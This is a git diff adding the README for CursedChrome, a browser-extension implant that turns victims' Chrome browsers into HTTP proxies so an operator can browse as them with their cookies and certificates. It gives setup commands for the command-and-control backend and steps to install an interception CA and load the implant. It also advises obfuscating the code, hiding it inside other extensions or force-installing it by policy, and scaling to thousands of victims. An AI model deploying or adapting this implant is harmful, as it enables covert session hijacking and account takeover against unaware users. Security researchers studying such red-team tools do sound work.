|
| 1 | +# CursedChrome |
| 2 | + |
| 3 | +## What is it? |
| 4 | +A ([cursed](https://knowyourmeme.com/memes/cursed-image)) Chrome-extension implant that turns victim Chrome browsers into fully-functional HTTP proxies. By using the proxies this tool creates you can browse the web authenticated as your victim for all of their websites. |
| 5 | + |
| 6 | +More and more companies are moving toward the ["BeyondCorp"](https://en.wikipedia.org/wiki/BeyondCorp) model (e.g. no flat internal network, zero trust everything). This is usually implemented via a [reverse proxy/OAuth wall](https://github.com/bitly/oauth2_proxy) gating access to services, eliminating the need for a VPN. With more and more access becoming strictly available via the web browser, having a way to easily hijack and use victim's web sessions becomes an ever increasing necessity. |
| 7 | + |
| 8 | +This is especially useful for locked down orgs that make use of [Chrome OS](https://en.wikipedia.org/wiki/Chrome_OS) where traditional malware can't be used at all. It's also steathy, as all requests will have the appropriate source-IP, cookies, client-certificates, etc since it's being proxying directly through the victim's browser. |
| 9 | + |
| 10 | +## Screenshots |
| 11 | + |
| 12 | +### Web Admin Panel |
| 13 | + |
| 14 | + |
| 15 | +### Browsing Websites Logged In as Victim (using Firefox with HTTP Proxy) |
| 16 | + |
| 17 | + |
| 18 | +## (Rough) Infrastructure Diagram (`docker-compose` Used) |
| 19 | + |
| 20 | + |
| 21 | + |
| 22 | +### Ports & Listening Interfaces |
| 23 | + |
| 24 | +- `127.0.0.1:8080`: HTTP proxy server (using one of the credentials in the admin panel, you can auth to a specific victim's Chrome browser via this HTTP proxy server). You also need to install the generated CA available via the admin panel before using this. |
| 25 | +- `127.0.0.1:4343`: Websocket server, used for communicating with victim Chrome instances to transfer HTTP requests for proxying and sending commands. |
| 26 | +- `127.0.0.1:8118`: Admin web panel for viewing victim Chrome instances and getting HTTP proxy credentials. |
| 27 | + |
| 28 | + |
| 29 | +## Requirements |
| 30 | + |
| 31 | +* [`docker`](https://docs.docker.com/get-docker/) and [`docker-compose`](https://docs.docker.com/compose/install/) |
| 32 | +* Chrome web browser |
| 33 | + |
| 34 | +## Setting Up the Backend |
| 35 | + |
| 36 | +The backend is entirely dockerized and can be setup by running the following commands: |
| 37 | + |
| 38 | +``` |
| 39 | +cd cursedchrome/ |
| 40 | +# Start up redis and Postgres containers in the background |
| 41 | +docker-compose up -d redis db |
| 42 | +# Start the CursedChrome backend |
| 43 | +docker-compose up cursedchrome |
| 44 | +``` |
| 45 | + |
| 46 | +Once you start up the backend you'll see an admin username and password printed to the console. You can log into the admin panel at `http://localhost:8118` using these credentials (you will be prompted to change your password upon logging in since the one printed to the console is likely logged). |
| 47 | + |
| 48 | +## Installing the CursedChrome CA for Proxying HTTPS |
| 49 | + |
| 50 | +Once you have the backend setup, log in to the admin panel at `http://localhost:8118` (see above) and click the `Download HTTPS Proxy CA Certificate` button. This will download the generated CA file which is required in order to proxy HTTPS requests. |
| 51 | + |
| 52 | +You will need to install this CA into your root store, the following are instructions for various OS/browsers: |
| 53 | + |
| 54 | +* [OS X/Mac](https://www.sslsupportdesk.com/how-to-import-a-certificate-into-mac-os/) |
| 55 | +* [Windows](https://www.sslsupportdesk.com/how-to-enable-or-disable-all-puposes-of-root-certificates-in-mmc/) |
| 56 | +* [Linux](https://thomas-leister.de/en/how-to-import-ca-root-certificate/) |
| 57 | +* [Firefox (any OS)](https://support.securly.com/hc/en-us/articles/360008547993-How-to-Install-Securly-s-SSL-Certificate-in-Firefox-on-Windows) |
| 58 | + |
| 59 | +## Setting Up the Example Chrome Extension Implant |
| 60 | + |
| 61 | +To install the example chrome extension implant, do the following: |
| 62 | + |
| 63 | +* Open up a Chrome web browser and navigate to `chrome://extensions`. |
| 64 | +* Click the toggle in the top-right corner of the page labeled `Developer mode` to enable it. |
| 65 | +* Click the `Load unpacked` button in the top-left corner of the page. |
| 66 | +* Open the `extension/` folder inside of this repo folder. |
| 67 | +* Once you've done so, the extension will be installed. |
| 68 | + |
| 69 | +*Note:* You can debug the implant by clicking on the `background page` link for the text `Inspect views background page` under the `CursedChrome Implant` extension. |
| 70 | + |
| 71 | +After you've install the extension it will show up on the admin control panel at `http://localhost:8118`. |
| 72 | + |
| 73 | +## Modifying Implant Extension |
| 74 | + |
| 75 | +An example implant extension has been included under the `extension/` folder. This extension has the `extension/src/bg/background.js` file which has the extension-side of the implant that connects to the service via WebSocket to proxy requests through the victim's web browser. |
| 76 | + |
| 77 | +The following [extension permissions](https://developer.chrome.com/extensions/api_index) are needed by the implant to operate: |
| 78 | + |
| 79 | +``` |
| 80 | +"permissions": [ |
| 81 | + "webRequest", |
| 82 | + "webRequestBlocking", |
| 83 | + "<all_urls>" |
| 84 | +] |
| 85 | +``` |
| 86 | + |
| 87 | +This code contains comments on how to modify it for a production setup. Basically doing the following: |
| 88 | + |
| 89 | +* Minifying/stripping/uglifying the JavaScript code |
| 90 | +* Modifying the WebSocket connection URI in the `initialize()` function to point to the host you've set up the backend on. By default it's set to `ws://localhost:4343` which will work with the out-of-the-box dev setup described in this README. |
| 91 | + |
| 92 | +In a real world attack, this extension code would be used in one of the following ways: |
| 93 | + |
| 94 | +* Injected into an existing extension with proper permissions via Chrome debugging protocol. |
| 95 | +* Hidden inside of another extension |
| 96 | +* Force-installed via Chrome enterprise policy |
| 97 | + |
| 98 | +These topics are outside of the scope of this README, but eventually will be covered separately. |
| 99 | + |
| 100 | +## Notes on Production Deployments |
| 101 | + |
| 102 | +* You will likely want to run an Nginx server with a valid HTTPS certificate doing a `proxy_pass` to the WebSocket server (running on `127.0.0.1:4343`). Then you'll have TLS-encrypted websocket traffic. |
| 103 | +* For a more secure setup, don't expose the HTTP proxy & and admin panel to the Internet directly. Opt for SSL port-forwarding or using a bastion server to connect to it. |
| 104 | +* For situations with a large number of victims/bots/implants running, you can horizontally scale out the CursedChrome server as wide as you need to. The socket handling is completely decoupled via `redis`, so it can suppose (theoretically) tens of thousands of concurrent clients. |
| 105 | + |
| 106 | +## Attributions |
| 107 | + |
| 108 | +* The icon used for the web panel favicon and the example Chrome implant extension is provided by Freepik from `www.flaticon.com`. |
| 109 | +* The [AnyProxy source code](https://github.com/alibaba/anyproxy) was heavily modified and used for part of this project. |
0 commit comments